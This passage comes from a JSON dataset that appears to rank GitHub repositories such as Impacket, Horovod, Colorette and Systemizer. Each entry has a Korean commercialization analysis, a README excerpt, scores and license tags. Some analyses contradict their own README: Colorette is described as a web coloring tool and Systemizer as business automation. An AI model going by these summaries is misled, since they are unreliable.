쓸 수 있나\n1. **클라우드 연동 SaaS**: 온라인 협업 도구나 클라우드 저장소 서비스가 서버와 통신할 때 기반이 되는 기술\n2. **엔","readme_excerpt":"**The C++ REST SDK is in maintenance-only mode and we do not recommend its use in new projects.\nWe will continue to fix critical security issues only.**\n\n## Welcome!\n\nThe C++ REST SDK is a Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. This project aims to help C++ developers connect to and interact with services.  \n\n## Getting Started\n\n[![Vcpkg package](https://repology.org/badge/version-for-repo/vcpkg/cpprestsdk.svg)](https://repology.org/metapackage/cpprestsdk)</br>\n[![Homebrew package](https://repology.org/badge/version-for-repo/homebrew/cpprestsdk.svg)](https://repology.org/metapackage/cpprestsdk)</br>\n[![Ubuntu 18.04 package](https://repology.org/badge/version-for-repo/ubuntu_18_04/cpprestsdk.svg)](https://repology.org/metapackage/cpprestsdk)</br>\n[![Fedora Rawhide package](https://repology.org/badge/version-for-repo/fedora_rawhide/cpprestsdk.svg)](https://repology.org/metapackage/cpprestsdk)</br>\n[![openSU","composite_score":0.1602,"license_safety_tag":"unknown"},{"name":"asatarin/testing-distributed-systems","github_url":"https://github.com/asatarin/testing-distributed-systems","stars":7,"language":"HTML","license":"CC-BY-4.0","abandonment_months":3,"description":"# asatarin/testing-distributed-systems 분석\n\n## 왜 보물인가\n여러 컴퓨터가 함께 일할 때 제대로 작동하는지 검증하는 방법을 체계적으로 정리한 자료로, AI 모델의 답변이 정말 맞는지 확인하는 데 필수적인 지식입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 기반 고객 서비스 SaaS**: 챗봇의 답변이 정확한지 자동으로 검","readme_excerpt":"List of resources on testing distributed systems curated by [Andrey Satarin](https://asatarin.github.io/).\nIf you are interested in my other stuff, [check out public talks](https://asatarin.github.io/talks/).\nFor any questions or suggestions you can reach out to me on [Twitter](https://twitter.com/asatarin),\nBluesky [@asatarin.bsky.social](https://bsky.app/profile/asatarin.bsky.social)\nor [other platforms](https://asatarin.github.io/follow/).\n\n{% comment %}\nPrivate notes https://docs.google.com/document/d/1xHt_PK9yGMTP6JNDMydQLF4SHIdlq-BF9IZeTOXtIOg/edit\n{% endcomment %}\n\n**Table of Contents**\n\n[//]: # (@formatter:off)\n* A Markdown unordered list which will be replaced with the ToC\n{:toc}\n\n[//]: # (@formatter:on)\n\n## Overview of Testing Approaches\n\n### Research Papers\n\n#### Bugs\n\n* [What Bugs Live in the Cloud? A Study of 3000+ Issues in Cloud Systems](https://dl.acm.org/doi/abs/10.1145/2670979.2670986)—\n  study of actual bugs in different popular distributed systems (Hadoop MapReduce,","composite_score":0.1602,"license_safety_tag":"unknown"},{"name":"Unity-Technologies/FPSSample","github_url":"https://github.com/Unity-Technologies/FPSSample","stars":6,"language":"C#","license":"NOASSERTION","abandonment_months":7,"description":"# Unity FPS Sample 분석 보고서\n\n## 왜 보물인가\nUnity 게임 엔진으로 만든 총기 게임의 완성된 예제로, 게임 개발자들이 참고할 수 있는 고품질의 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 교육 플랫폼**: 초보 게임 개발자를 위한 온라인 강좌에 이 코드를 분석 자료로 제공\n2. **게임 개발 자문 서비스**: 스튜","readme_excerpt":"![](Documentation/Images/Banner.png)\n\n# FPS Sample\n\n**Update about the state of the project:**\nThis project is based on Unity 2018.3 and no longer being actively maintained.\nFeel free to continue to use it as a learning resource or simply for\ninspiration. As always, you should upgrade to latest version of Unity\nand packages if you intend to start a project.\n\nThanks for checking out this sample!\n\nThis is a fully functional, first person multiplayer shooter game made in\nUnity and with full source and assets. It was developed by a small\nteam from Unity Technologies. Our goals are to test and showcase new\nfeatures in Unity and to be of use for teams who can bootstrap on top of\nthis, extract useful bits and tools or simply learn from and get inspired by\nwhat is in the project.\n\nVisit our [landing page](https://unity.com/fps-sample) for more high\nlevel information about the project. Or reach out [in the forum](https://forum.unity.com/forums/fps-sample-game.184).\n\nThe project is using a numbe","composite_score":0.16,"license_safety_tag":"unknown"},{"name":"rusty1s/pytorch_geometric","github_url":"https://github.com/rusty1s/pytorch_geometric","stars":10,"language":"Python","license":"MIT","abandonment_months":0,"description":"# PyTorch Geometric 평가 분석\n\n## 왜 보물인가\n복잡한 데이터 구조(예: 소셜 네트워크, 분자 구조)를 분석하는 인공지능 모델을 쉽게 만들 수 있게 해주는 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 신약 개발 SaaS**\n- 제약사들이 신약 후보 물질의 특성을 빠르게 예측하는 클라우드 서비스로 제공\n\n**2. 사기 탐지 API","readme_excerpt":"<p align=\"center\">\n  <img height=\"150\" src=\"https://raw.githubusercontent.com/pyg-team/pyg_sphinx_theme/master/pyg_sphinx_theme/static/img/pyg_logo_text.svg?sanitize=true\" />\n</p>\n\n______________________________________________________________________\n\n<div align=\"center\">\n\n[![PyPI Version][pypi-image]][pypi-url]\n[![PyPI Download][pypi-download-image]][pypi-download-url]\n[![Slack][slack-image]][slack-url]\n[![Contributing][contributing-image]][contributing-url]\n\n**[Documentation](https://pytorch-geometric.readthedocs.io)** |\n**[PyG 1.0 Paper](https://arxiv.org/abs/1903.02428)** |\n**[PyG 2.0 Paper](https://arxiv.org/abs/2507.16991)** |\n**[Colab Notebooks](https://pytorch-geometric.readthedocs.io/en/latest/get_started/colabs.html)** |\n**[External Resources](https://pytorch-geometric.readthedocs.io/en/latest/external/resources.html)** |\n**[OGB Examples](https://github.com/snap-stanford/ogb/tree/master/examples)**\n\n</div>\n\n**PyG** *(PyTorch Geometric)* is a library built upon [PyTorch](http","composite_score":0.1597,"license_safety_tag":"safe"},{"name":"streamxhub/streamx","github_url":"https://github.com/streamxhub/streamx","stars":8,"language":"Java","license":"Apache-2.0","abandonment_months":2,"description":"# StreamXHub 분석 보고서\n\n## 왜 보물인가\n실시간 데이터를 처리하는 기술을 쉽게 구축할 수 있는 플랫폼으로, 금융·물류·통신사 같은 대기업들이 매년 수억 원을 투자하는 영역입니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 모니터링 SaaS**: 기업의 서버·시스템 상태를 실시간으로 감시하고 문제 발생 시 즉시 알려주는 대시보드 서비스\n2. ","readme_excerpt":"<!--\n  ~ Licensed to the Apache Software Foundation (ASF) under one or more\n  ~ contributor license agreements.  See the NOTICE file distributed with\n  ~ this work for additional information regarding copyright ownership.\n  ~ The ASF licenses this file to You under the Apache License, Version 2.0\n  ~ (the \"License\"); you may not use this file except in compliance with\n  ~ the License.  You may obtain a copy of the License at\n  ~\n  ~    http://www.apache.org/licenses/LICENSE-2.0\n  ~\n  ~ Unless required by applicable law or agreed to in writing, software\n  ~ distributed under the License is distributed on an \"AS IS\" BASIS,\n  ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n  ~ See the License for the specific language governing permissions and\n  ~ limitations under the License.\n  ~\n  -->\n\nApache StreamPark\n==========\n\n<img src=\"https://streampark.apache.org/image/logo_name.png\" alt=\"StreamPark logo\" height=\"90px\" align=\"right\" />\n\n**StreamPark**: a streaming app","composite_score":0.1592,"license_safety_tag":"safe"},{"name":"uber/horovod","github_url":"https://github.com/uber/horovod","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":6,"description":"# Horovod 저장소 분석\n\n## 왜 보물인가\n여러 컴퓨터를 연결해 인공지능 학습을 빠르게 하는 오픈소스 도구로, 대규모 데이터 처리가 필요한 기업들의 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 모델 학습 플랫폼 SaaS**: 스타트업이나 중소 AI 회사가 고객들에게 \"빠른 학습 환경\"을 제공하는 클라우드 서비스\n2. **대기업 내부","readme_excerpt":".. raw:: html\n\n    <p align=\"center\"><img src=\"https://user-images.githubusercontent.com/16640218/34506318-84d0c06c-efe0-11e7-8831-0425772ed8f2.png\" alt=\"Logo\" width=\"200\"/></p>\n    <br/>\n\nHorovod\n=======\n\n.. raw:: html\n\n   <div align=\"center\">\n\n.. image:: https://badge.fury.io/py/horovod.svg\n   :target: https://badge.fury.io/py/horovod\n   :alt: PyPI Version\n\n.. image:: https://badge.buildkite.com/6f976bc161c69d9960fc00de01b69deb6199b25680a09e5e26.svg?branch=master\n   :target: https://buildkite.com/horovod/horovod\n   :alt: Build Status\n\n.. image:: https://readthedocs.org/projects/horovod/badge/?version=latest\n   :target: https://horovod.readthedocs.io/en/latest/\n   :alt: Documentation Status\n\n.. image:: https://img.shields.io/badge/slack-chat-green.svg?logo=slack\n   :target: https://forms.gle/cPGvty5hp31tGfg79\n   :alt: Slack\n\n.. raw:: html\n\n   </div>\n\n.. raw:: html\n\n   <div align=\"center\">\n\n.. image:: https://img.shields.io/badge/License-Apache%202.0-blue.svg\n   :target: https://img.sh","composite_score":0.159,"license_safety_tag":"unknown"},{"name":"madrobby/zepto","github_url":"https://github.com/madrobby/zepto","stars":10,"language":"HTML","license":"NOASSERTION","abandonment_months":1,"description":"# Zepto 저장소 분석\n\n## 왜 보물인가\n웹 개발에서 필수적인 기능들을 가볍고 빠르게 제공하는 핵심 도구로, 개발자들의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 애플리케이션 개발 플랫폼**: 기업이 빠르게 웹 서비스를 만들 수 있도록 지원하는 개발 환경 판매\n2. **웹사이트 빌더 서비스**: 프로그래밍을 모르는 사용자","readme_excerpt":"# Zepto.js – a minimalist JavaScript library\n\nZepto is a minimalist JavaScript library for modern browsers with a\nlargely jQuery-compatible API. If you use jQuery, you already know how to use Zepto.\n\nSee [zeptojs.com][] for an extended introduction, downloads\nand documentation.\n\nZepto.js is licensed under the terms of the MIT License.\n\nWant to give us money or a tip? Don't.\nInstead please donate to [charity: water](http://charitywater.org/).\n\n## Building\n\n[![Build Status](https://secure.travis-ci.org/madrobby/zepto.svg?branch=master)](http://travis-ci.org/madrobby/zepto)\n\nThe official site offers a download of the default distribution of Zepto. This\nis good for starting out. However, at some point you might want to add some\noptional modules and remove some of the default ones you don't need, to keep the\nsize at a minimum. That's when you need to check out Zepto's source code and use\nthe build commands.\n\nYou will need Node.js installed on your system.\n\n~~~ sh\n$ npm install\n$ npm run-scr","composite_score":0.1589,"license_safety_tag":"unknown"},{"name":"adambard/learnxinyminutes-docs","github_url":"https://github.com/adambard/learnxinyminutes-docs","stars":6,"language":"Markdown","license":"NOASSERTION","abandonment_months":1,"description":"# learnxinyminutes-docs 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 사람들이 여러 언어를 빠르게 익힐 수 있도록 정리한 교육 자료 모음으로, 학습 수요가 지속적으로 높은 분야입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보자용 빠른 시작 가이드 콘텐츠로 제공하여 유료 구독 유도\n2. **기업 직","readme_excerpt":"# [Learn X in Y minutes][1]\n\nWhirlwind tours of (several, hopefully many someday) popular and\nought-to-be-more-popular programming languages, presented as valid, commented\ncode and explained as they go.\n\n## We need YOU!...\n\n... to write more inline code tutorials. Just grab an existing file from this\nrepo and copy the formatting (don't worry, it's all very simple). Make a new\nfile, send a pull request, and if it passes muster I'll get it up pronto.\nRemember to fill in the \"contributors\" fields so you get credited properly!\n\n## Contributing\n\nAll contributions are welcome, from the tiniest typo to a brand new article.\nTranslations in all languages are welcome (or, for that matter, original\narticles in any language). Send a pull request or open an issue any time of day\nor night.\n\n**Please prepend the tag `[language/lang-code]` to your issues and pull\nrequests.** For example, `[python/en]` for English Python. This will help\neveryone pick out things they care about.\n\nWe're happy for any con","composite_score":0.1587,"license_safety_tag":"unknown"},{"name":"chuzhixin/vue-admin-beautiful-pro","github_url":"https://github.com/chuzhixin/vue-admin-beautiful-pro","stars":11,"language":"Vue","license":"MIT","abandonment_months":0,"description":"# vue-admin-beautiful-pro 분석 보고서\n\n## 왜 보물인가\n기업의 관리자 화면을 빠르게 만들 수 있는 기초 틀(템플릿)로, 개발자의 개발 시간을 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 스타트업이 자신의 SaaS 제품 관리 대시보드를 빠르게 구축할 때 활용\n2. **내부 업무 도구**","readme_excerpt":"<div align=\"center\">\n  <img width=\"200\" src=\"https://assets.rspack.rs/rspack/rspack-logo.svg\"/>\n  <h1>Vue Admin Better</h1>\n  <p>拒绝过度封装，去除等待时间，让项目回归纯粹，让开发变得简单</p>\n</div>\n\n[![stars](https://img.shields.io/github/stars/zxwk1998/vue-admin-better?style=flat-square&logo=GitHub)](https://github.com/zxwk1998/vue-admin-better)\n[![star](https://gitee.com/chu1204505056/vue-admin-better/badge/star.svg?theme=gray)](https://gitee.com/chu1204505056/vue-admin-better)\n[![license](https://img.shields.io/github/license/zxwk1998/vue-admin-better?style=flat-square)](https://en.wikipedia.org/wiki/MIT_License)\n\n---\n\n## 🚀 2026 全新启程\n\n- ⚡️ 项目运行速度提升 10-15 倍，打包速度提升 20-30 倍\n- 🕒 整体构建时间控制在 5 秒以内，带来飞一般的开发体验\n\n## 🎉 特性\n\n- 💪 40+高质量单页\n- 💅 RBAC 模型 + JWT 权限控制\n- 🌍 10 万+ 项目实际应用\n- 👏 良好的类型定义\n- 🥳 开源版本支持免费商用\n- 🚀 跨平台 PC、手机端、平板\n- 📦️ 后端路由动态渲染\n\n## 🌐 演示地址\n\n### 💡 社区版演示\n\n- [🎉 Admin Better - github 实时部署 （vue2.x + element-ui 免费商用，支持 PC、平板、手机）](https://zxwk1998.github.io/vue-admin-better/)\n- [🎉 Admin Better （vue2.x + element-ui 免费商用，支持 PC","composite_score":0.158,"license_safety_tag":"safe"},{"name":"likedan/Awesome-CoreML-Models","github_url":"https://github.com/likedan/Awesome-CoreML-Models","stars":6,"language":"Python","license":"mit","abandonment_months":11,"description":"# Awesome-CoreML-Models 분석\n\n## 왜 보물인가\n아이폰·아이패드에서 작동하는 AI 모델들을 한곳에 모아놓아서, 앱 개발자들이 쉽게 인공지능 기능을 자신의 앱에 집어넣을 수 있게 해준다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 배경 자동 제거, 사진 품질 개선 등의 기능을 아이폰 앱으로 제공하는 월 구독 서비스\n2. ","readme_excerpt":"\n\n<!--\nTitle: Awesome Core ML Models\nDescription: A curated list of machine learning models in Core ML format.\nAuthor: Kedan Li\n-->\n<p align=\"center\">\n<img src=\"images/coreml.png\" width=\"329\" height=\"295\"/>\n</p>\n\n\nSince iOS 11, Apple released Core ML framework to help developers integrate machine learning models into applications. [The official documentation](https://developer.apple.com/documentation/coreml)\n\nWe've put up the largest collection of machine learning models in Core ML format, to help  iOS, macOS, tvOS, and watchOS developers experiment with machine learning techniques.\n\nIf you've converted a Core ML model, feel free to submit a [pull request](https://github.com/likedan/Awesome-CoreML-Models/compare).\n\nRecently, we've included visualization tools. And here's one [Netron](https://lutzroeder.github.io/Netron).\n\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n[![PRs Wel","composite_score":0.158,"license_safety_tag":"safe"},{"name":"mps-youtube/mps-youtube","github_url":"https://github.com/mps-youtube/mps-youtube","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":3,"description":"# mps-youtube 상용화 분석\n\n## 왜 보물인가\n유튜브 영상을 터미널(검은 화면)에서 직접 재생하고 관리할 수 있는 도구로, 인터넷 속도가 느리거나 간단한 환경에서 영상을 효율적으로 이용하려는 사람들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **저역폭 환경 SaaS**: 개발도상국이나 시골 지역 사용자를 위한 가벼운 영상 스트리밍 서비스\n2","readme_excerpt":"\n![](https://img.shields.io/pypi/v/yewtube.svg)  ![](https://img.shields.io/pypi/wheel/yewtube.svg)\n\n## STOP GENOCIDE OF INNOCENT PEOPLE\n\n![](https://upload.wikimedia.org/wikipedia/commons/thumb/0/00/Flag_of_Palestine.svg/1280px-Flag_of_Palestine.svg.png)\n\n<pre>\n                      _         _          \n                     | |       | |         \n  _   _  _____      _| |_ _   _| |__   ___ \n | | | |/ _ \\ \\ /\\ / / __| | | | '_ \\ / _ \\\n | |_| |  __/\\ V  V /| |_| |_| | |_) |  __/\n  \\__, |\\___| \\_/\\_/  \\__|\\__,_|_.__/ \\___|\n   __/ |                                   \n  |___/\n\n\n</pre>\n\nyewtube, forked from mps-youtube , is a Terminal based YouTube player and downloader. No Youtube API key required. <br>\nVisit [this](./COLLABORATORS.md) page if you want to support maintainers of this project.\n\nInstallation\n-----------\n# Stable Version\n\n### Using pip\n1. Install using `pip install yewtube`\n2. Run using, `yt`. Enjoy! \n\n### Using pipx (Recommended)\n1.  Install **_pipx_** using `pip install pipx","composite_score":0.1576,"license_safety_tag":"restricted"},{"name":"SecureAuthCorp/impacket","github_url":"https://github.com/SecureAuthCorp/impacket","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# SecureAuthCorp/impacket 상용화 분석\n\n## 왜 보물인가\nWindows 시스템에 안전하게 접근하고 관리하는 기술을 담은 저장소로, 기업의 보안 인프라 구축에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 접근 관리 SaaS**: 직원들의 컴퓨터 원격 제어 및 보안 감시 플랫폼\n2. **내부 IT 운영 도구**: 회사 ","readme_excerpt":"<img alt=\"Impacket_light\" src=\"https://github.com/user-attachments/assets/14aed700-0c6e-4865-ac53-686b91874f50\" />\n\nImpacket\n========\n\n[![Latest Version](https://img.shields.io/pypi/v/impacket.svg)](https://pypi.python.org/pypi/impacket/)\n[![Build and test Impacket](https://github.com/fortra/impacket/actions/workflows/build_and_test.yml/badge.svg)](https://github.com/fortra/impacket/actions/workflows/build_and_test.yml)\n\nCopyright Fortra, LLC and its affiliated companies. All rights reserved.\n\nImpacket was originally created by [SecureAuth](https://www.secureauth.com/labs/open-source-tools/impacket), and now maintained by Fortra's Core Security.\n\nImpacket is a collection of Python classes for working with network\nprotocols. Impacket is focused on providing low-level\nprogrammatic access to the packets and for some protocols (e.g.\nSMB1-3 and MSRPC) the protocol implementation itself.\nPackets can be constructed from scratch, as well as parsed from \nraw data, and the object-oriented API ma","composite_score":0.1572,"license_safety_tag":"unknown"},{"name":"chuzhixin/vue-admin-beautiful","github_url":"https://github.com/chuzhixin/vue-admin-beautiful","stars":10,"language":"Vue","license":"MIT","abandonment_months":0,"description":"# vue-admin-beautiful 분석 보고서\n\n## 왜 보물인가\n기업의 업무 관리 시스템을 빠르고 저렴하게 만들 수 있는 완성된 디자인 템플릿입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 직원 관리, 매출 추적 시스템으로 빠른 출시\n- **내부 업무 도구**: 회사의 재고 관리, 인사 시스템, 보고서 작성 도구로 커스터","readme_excerpt":"<div align=\"center\">\n  <img width=\"200\" src=\"https://assets.rspack.rs/rspack/rspack-logo.svg\"/>\n  <h1>Vue Admin Better</h1>\n  <p>拒绝过度封装，去除等待时间，让项目回归纯粹，让开发变得简单</p>\n</div>\n\n[![stars](https://img.shields.io/github/stars/zxwk1998/vue-admin-better?style=flat-square&logo=GitHub)](https://github.com/zxwk1998/vue-admin-better)\n[![star](https://gitee.com/chu1204505056/vue-admin-better/badge/star.svg?theme=gray)](https://gitee.com/chu1204505056/vue-admin-better)\n[![license](https://img.shields.io/github/license/zxwk1998/vue-admin-better?style=flat-square)](https://en.wikipedia.org/wiki/MIT_License)\n\n---\n\n## 🚀 2026 全新启程\n\n- ⚡️ 项目运行速度提升 10-15 倍，打包速度提升 20-30 倍\n- 🕒 整体构建时间控制在 5 秒以内，带来飞一般的开发体验\n\n## 🎉 特性\n\n- 💪 40+高质量单页\n- 💅 RBAC 模型 + JWT 权限控制\n- 🌍 10 万+ 项目实际应用\n- 👏 良好的类型定义\n- 🥳 开源版本支持免费商用\n- 🚀 跨平台 PC、手机端、平板\n- 📦️ 后端路由动态渲染\n\n## 🌐 演示地址\n\n### 💡 社区版演示\n\n- [🎉 Admin Better - github 实时部署 （vue2.x + element-ui 免费商用，支持 PC、平板、手机）](https://zxwk1998.github.io/vue-admin-better/)\n- [🎉 Admin Better （vue2.x + element-ui 免费商用，支持 PC","composite_score":0.1572,"license_safety_tag":"safe"},{"name":"mobxjs/mobx-state-tree","github_url":"https://github.com/mobxjs/mobx-state-tree","stars":7,"language":"TypeScript","license":"mit","abandonment_months":2,"description":"# mobx-state-tree 상용화 분석\n\n## 왜 보물인가\n복잡한 앱의 데이터를 효율적으로 관리해주는 기술로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 실시간 협업 도구(노션, 슬랙 같은)에서 여러 사용자의 변경사항을 안정적으로 동기화하는 데 활용\n2. **내부 업무 도구**: 대규모 데이터를 ","readme_excerpt":"<img src=\"website/static/img/mobx-state-tree-logo-gradient.png\" alt=\"logo\" height=\"120\" align=\"right\" />\n\n# mobx-state-tree\n\n[![npm version](https://badge.fury.io/js/mobx-state-tree.svg)](https://badge.fury.io/js/mobx-state-tree)\n[![CircleCI](https://circleci.com/gh/mobxjs/mobx-state-tree.svg?style=svg)](https://circleci.com/gh/mobxjs/mobx-state-tree)\n[![Have a question? Ask on GitHub Discussions!](https://img.shields.io/badge/Have%20a%20question%3F-Ask%20on%20GitHub%20Discussions!-blue)](https://github.com/mobxjs/mobx-state-tree/discussions)\n\n## What is mobx-state-tree?\n\nTechnically speaking, mobx-state-tree (also known as MST) is a state container system built on [MobX](https://github.com/mobxjs/mobx), a functional reactive state library.\n\nThis may not mean much to you, and that’s okay. I’ll explain it like this: **MobX is a state management \"engine\", and MobX-State-Tree gives it structure and common tools you need for your app.** MST is valuable in a large team but also useful in sm","composite_score":0.1572,"license_safety_tag":"safe"},{"name":"linkedin/cruise-control","github_url":"https://github.com/linkedin/cruise-control","stars":6,"language":"Java","license":"BSD-2-Clause","abandonment_months":7,"description":"# LinkedIn Cruise Control 분석\n\n## 왜 보물인가\n큰 규모의 데이터를 효율적으로 관리하고 조정하는 전문 도구로, 대규모 시스템을 운영하는 기업들이 매우 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 처리 성능을 자동으로 최적화해주는 관리 플랫폼으로 월 구독료 징수\n2. **내부 업무 도구**","readme_excerpt":"Cruise Control for Apache Kafka\n===================\n\n[![CI](https://github.com/linkedin/cruise-control/actions/workflows/ci.yaml/badge.svg)](https://github.com/linkedin/cruise-control/actions/workflows/ci.yaml)\n[![CircleCI](https://circleci.com/gh/linkedin/cruise-control.svg?style=svg)](https://circleci.com/gh/linkedin/cruise-control)\n\n\n### Introduction ###\n  Cruise Control is a product that helps run Apache Kafka clusters at large scale. Due to the popularity of \n  Apache Kafka, many companies have increasingly large Kafka clusters with hundreds of brokers. At LinkedIn, we have 10K+ Kafka brokers, \n  which means broker deaths are an almost daily occurrence and balancing the workload of Kafka also becomes a big overhead. \n  \n  Kafka Cruise Control is designed to address this operational scalability issue.\n  \n### Features ###\n  Kafka Cruise Control provides the following features out of the box:\n  \n  * Resource utilization tracking for brokers, topics, and partitions.\n  \n  * Query the c","composite_score":0.1568,"license_safety_tag":"safe"},{"name":"jorgebucaran/colorette","github_url":"https://github.com/jorgebucaran/colorette","stars":24,"language":"JavaScript","license":"MIT","abandonment_months":8,"description":"# Colorette 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 글씨와 배경색을 예쁘게 표현해주는 가벼운 도구로, 개발자들이 빠르고 쉽게 색상 기능을 추가할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 대시보드**: 데이터 분석 서비스에서 차트와 그래프를 다양한 색상으로 시각화하는 기능\n2. **개발자 도구 판매**: 프로그래밍 학습 ","readme_excerpt":"# 🌈Colorette\n\n> Easily set your terminal text color & styles.\n\n- No dependecies\n- Automatic color support detection\n- Up to [2x faster](#benchmarks) than alternatives\n- TypeScript support\n- [`NO_COLOR`](https://no-color.org) friendly\n- Node >= `10`\n\n> [**Upgrading from Colorette `1.x`?**](https://github.com/jorgebucaran/colorette/issues/70)\n\n## Quickstart\n\n```js\nimport { blue, bold, underline } from \"colorette\"\n\nconsole.log(\n  blue(\"I'm blue\"),\n  bold(blue(\"da ba dee\")),\n  underline(bold(blue(\"da ba daa\")))\n)\n```\n\nHere's an example using [template literals](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals).\n\n```js\nconsole.log(`\n  There's a ${underline(blue(\"house\"))},\n  With a ${bold(blue(\"window\"))},\n  And a ${blue(\"corvette\")}\n  And everything is blue\n`)\n```\n\nYou can also nest styles without breaking existing color sequences.\n\n```js\nconsole.log(bold(`I'm ${blue(`da ba ${underline(\"dee\")} da ba`)} daa`))\n```\n\nNeed to override terminal color detection","composite_score":0.1568,"license_safety_tag":"safe"},{"name":"arzzen/git-quick-stats","github_url":"https://github.com/arzzen/git-quick-stats","stars":5,"language":"Shell","license":"mit","abandonment_months":1,"description":"# git-quick-stats 상용화 분석\n\n## 왜 보물인가\n개발 팀의 작업 속도와 생산성을 한눈에 파악할 수 있는 분석 도구로, 회사의 개발 성과를 객관적으로 측정할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발 팀 관리자가 월구독으로 팀원들의 코딩 활동량, 커밋 빈도, 작업 추세를 실시간으로 모니터링하는 대시보드\n2.","readme_excerpt":"# GIT quick statistics [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Simple%20and%20efficient%20way%20to%20access%20various%20statistics%20in%20git%20repository&url=https://github.com/arzzen/git-quick-stat&via=arzzen&hashtags=git,stats,tool,statistics,developers)\r\n\r\n[![Homebrew package](https://repology.org/badge/version-for-repo/homebrew/git-quick-stats.svg)](https://formulae.brew.sh/formula/git-quick-stats#default)\r\n\r\n> `git-quick-stats` is a simple and efficient way to access various statistics in a git repository.\r\n>\r\n> Any git repository may contain tons of information about commits, contributors, and files. Extracting this information is not always trivial, mostly because there are a gadzillion options to a gadzillion git commands - I don't think there is a single person alive who knows them all. Probably not even [Linus Torvalds](https://github.com/torvalds) himself :).\r\n\r\n![mainImageScreenshot](https://gith","composite_score":0.1566,"license_safety_tag":"safe"},{"name":"honzaap/Systemizer","github_url":"https://github.com/honzaap/Systemizer","stars":8,"language":"TypeScript","license":"GPL-3.0","abandonment_months":8,"description":"# Systemizer 분석 보고서\n\n## 왜 보물인가\n복잡한 시스템을 자동으로 정리하고 관리해주는 도구로, 기업의 반복적인 업무를 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 중소기업 대상 '업무 자동화 플랫폼'으로 클라우드 제공\n- 월 구독 모델로 안정적인 수익 창출\n\n**2. 내부 업무 도구**\n- 대기업의 I","readme_excerpt":"<p align=\"center\"><img align=\"center\" src=\"https://honzaap.github.io/Systemizer/assets/logo.svg\" width=100 height=100>\n<h1 align=\"center\">Systemizer</h1></p>\n\n\n<p align=\"center\">\n  <img alt=\"Scrutinizer build (GitHub/Bitbucket)\" src=\"https://img.shields.io/scrutinizer/build/g/honzaap/Systemizer/main?style=flat-square\">\n  <img alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/honzaap/Systemizer?style=flat-square\">\n  <img alt=\"GitHub last commit\" src=\"https://img.shields.io/github/last-commit/honzaap/Systemizer?color=2411ed&style=flat-square\">\n  <img alt=\"GitHub\" src=\"https://img.shields.io/github/license/honzaap/Systemizer?style=flat-square\">\n</p>\n\n<p>Systemizer is a system design tool used to create and simulate large scale distributed systems.\n</p>\n\n### Want to try Systemizer?\nSystemizer is currently hosted on <a href=\"https://honzaap.github.io/Systemizer/\">GitHub Pages</a>.\n\n![GIF of Systemizer](https://honzaap.github.io/Systemizer/assets/gifs/tutorial0.gif)\n\n### How d","composite_score":0.1565,"license_safety_tag":"restricted"},{"name":"opendevops-cn/opendevops","github_url":"https://github.com/opendevops-cn/opendevops","stars":11,"language":"Python","license":"GPL-3.0","abandonment_months":1,"description":"# OpenDevOps 저장소 분석\n\n## 왜 보물인가\n회사의 여러 IT 업무(배포, 모니터링, 설정 관리)를 한 곳에서 자동으로 처리할 수 있는 통합 관리 시스템으로, 수동 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 중소기업의 IT팀이 서버 관리, 배포 작업, 로그 확인을 이 도구 하나로 통합 관리\n2. *","readme_excerpt":"<p align=\"center\">\r\n    <a href=\"https://www.opendevops.cn/\">\r\n        <img width=\"200\" src=\"https://www.opendevops.cn/images/head_logo.png\">\r\n    </a>\r\n</p>\r\n\r\n[![opendevops/sb](https://jaywcjlove.github.io/sb/lang/english.svg)](README.md)\r\n[![opendevops/opendevops](https://jaywcjlove.github.io/sb/ico/gitee.svg)](http://gitee.com/opendevops)\r\n[![Python3](https://img.shields.io/badge/Python-3.9-green.svg?style=plastic)](https://www.python.org/)\r\n[![Golang](https://img.shields.io/badge/golang-1.23-brightgreen.svg?style=plastic)](https://golang.google.cn/)\r\n[![Tornado](https://img.shields.io/badge/Tornado-6.0-brightgreen.svg?style=plastic)](https://www.tornadoweb.org)\r\n[![Vue.js](https://img.shields.io/badge/Vuejs-2.5-brightgreen.svg?style=plastic)](https://cn.vuejs.org)\r\n[![Ant-Design.js](https://img.shields.io/badge/Ant--Design-4.8-blue.svg?style=plastic)](https://ant-design.antgroup.com/)\r\n[![Iview](https://img.shields.io/badge/iview-3.2.0-blue.svg?style=plastic)](https://www.iviewui.","composite_score":0.1565,"license_safety_tag":"restricted"},{"name":"pointfreeco/swift-custom-dump","github_url":"h